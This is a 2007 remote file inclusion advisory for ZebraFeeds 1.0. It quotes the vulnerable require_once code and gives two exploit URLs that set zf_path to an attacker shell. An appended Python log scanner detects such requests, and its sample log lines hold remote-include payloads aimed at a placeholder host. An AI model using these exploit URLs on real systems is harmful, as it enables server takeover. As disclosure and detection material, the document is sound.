From: ThE dE@Th <mostafa_ragab_(at)_msn.com>
Date: 15.02.2007
Subject: ZebraFeeds 1.0 (zf_path) Remote File Include Vulnerabilities

To ConTacT mE @ wWw.Asb-May.net/bb

ScRiPt:- http://cazalet.org/zebrafeeds/releases/zebrafeeds-current.zip

Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}>>

******************************************************************************
aggregator.php:-
require_once($zf_path . 'includes/feed.php');
require_once($zf_path . 'includes/view.php');
require_once($zf_path . 'includes/template.php');
require_once($zf_path . 'magpierss/rss_fetch.inc');

controller.php:-
require_once($zf_path . 'includes/template.php');
require_once($zf_path . 'includes/opml.php');
********************************************************************************
ExPlOiT:- http://www.SitE.com/newsfeeds/includes/aggregator.php?zf_path=[Shell]
ExPlOiT:- http://www.SitE.com/newsfeeds/includes/controller.php?zf_path=[Shell]
*******************************************************************************

# milw0rm.com [2007-02-15]
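A defender-side check for the pattern in this advisory, as an added example that is not part of the original post: it scans web access-log lines for requests to the two listed scripts that supply zf_path. The log lines, hosts and function names are constructed for illustration, and treating any client-supplied zf_path as suspicious is an assumption about normal deployments.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Scripts the advisory lists as building require_once() paths from $zf_path.
AFFECTED = ("/aggregator.php", "/controller.php")
# Values that make PHP include a URL or stream wrapper rather than a local path.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|data:|//)", re.I)
# Request target inside a combined-format access-log line.
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/\d\.\d"')

def classify(line):
    """Return (verdict, value) for a request that sets zf_path, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not unquote(target.path).lower().endswith(AFFECTED):
        return None
    # PHP rewrites '.' and ' ' in incoming parameter names to '_'.
    values = [v for k, v in parse_qsl(target.query, keep_blank_values=True)
              if k.replace(".", "_").replace(" ", "_") == "zf_path"]
    if not values:
        return None
    value = values[-1]  # PHP keeps the last duplicate of a parameter
    # Decode once more so a double-encoded scheme is still recognized.
    if REMOTE.match(unquote(value)):
        return ("remote-include", value)
    # Assumption: a normal deployment never takes zf_path from the client.
    return ("param-supplied", value)

def scan(lines):
    """Return (line_number, verdict, value) for every suspicious line."""
    return [(n, *hit) for n, line in enumerate(lines, 1)
            if (hit := classify(line))]

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '198.51.100.7 - - [15/Feb/2007:10:01:02 +0000] "GET /newsfeeds/index.php HTTP/1.1" 200 5120',
    '198.51.100.9 - - [15/Feb/2007:10:03:11 +0000] "GET /newsfeeds/includes/aggregator.php?zf_path=http://files.example.invalid/x.txt HTTP/1.1" 200 312',
    '198.51.100.9 - - [15/Feb/2007:10:03:15 +0000] "GET /newsfeeds/includes/controller.php?zf_path=hTTp%3A%2F%2Ffiles.example.invalid%2Fx.txt HTTP/1.1" 200 298',
    '203.0.113.4 - - [15/Feb/2007:10:09:40 +0000] "GET /newsfeeds/includes/aggregator.php?zf_path=./ HTTP/1.1" 200 77',
    '203.0.113.4 - - [15/Feb/2007:10:09:55 +0000] "GET /newsfeeds/includes/aggregator.php HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for n, verdict, value in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}: zf_path={value!r}")
```

A "remote-include" hit on a host where PHP runs with register_globals and remote includes enabled warrants checking the response size and any follow-up requests from the same client.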